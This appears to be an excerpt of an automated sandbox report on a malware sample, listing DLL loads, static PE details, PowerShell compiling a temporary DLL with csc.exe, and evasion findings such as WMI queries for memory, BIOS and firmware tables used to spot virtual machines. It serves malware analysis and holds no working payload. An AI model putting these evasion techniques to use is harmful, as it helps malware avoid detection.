Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\scoped_dir4212_1753283128	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Directory created: C:\Program Files\chrome_BITS_4212_794435973	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Directory created: C:\Program Files\chrome_BITS_4212_794435973\BITA127.tmp	Jump to behavior

Source: 7IXl1M9JGV.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: 7IXl1M9JGV.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 7IXl1M9JGV.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 7IXl1M9JGV.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 7IXl1M9JGV.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 7IXl1M9JGV.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 7IXl1M9JGV.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 7IXl1M9JGV.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: 7IXl1M9JGV.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: 7IXl1M9JGV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 7IXl1M9JGV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 7IXl1M9JGV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 7IXl1M9JGV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 7IXl1M9JGV.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline"			Jump to behavior

Source: 7IXl1M9JGV.exe

Static PE information: section name: _RDATA

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_004452F3 pushfd ; iretd		7_2_004452FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 7_2_00448C84 push esi; iretd		7_2_00448C8D

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File created: C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.dll

Jump to dropped file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_PhysicalMemory

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_PhysicalMemory

Query firmware table information (likely to detect VMs)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

System information queried: FirmwareTableInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window / User API: threadDelayed 9919

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.dll

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 1740	Thread sleep time: -90000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 9076	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\7IXl1M9JGV.exe

Code function: 0_2_00007FF7D77F8D4C FindFirstFileExW,

0_2_00007FF7D77F8D4C

Source: RegAsm.exe, 00000007.00000002.1061887586.0000000000B13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW<
Source: svchost.exe, 0000000E.00000002.2125122119.000001EE12296000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: @Hyper-V RAW
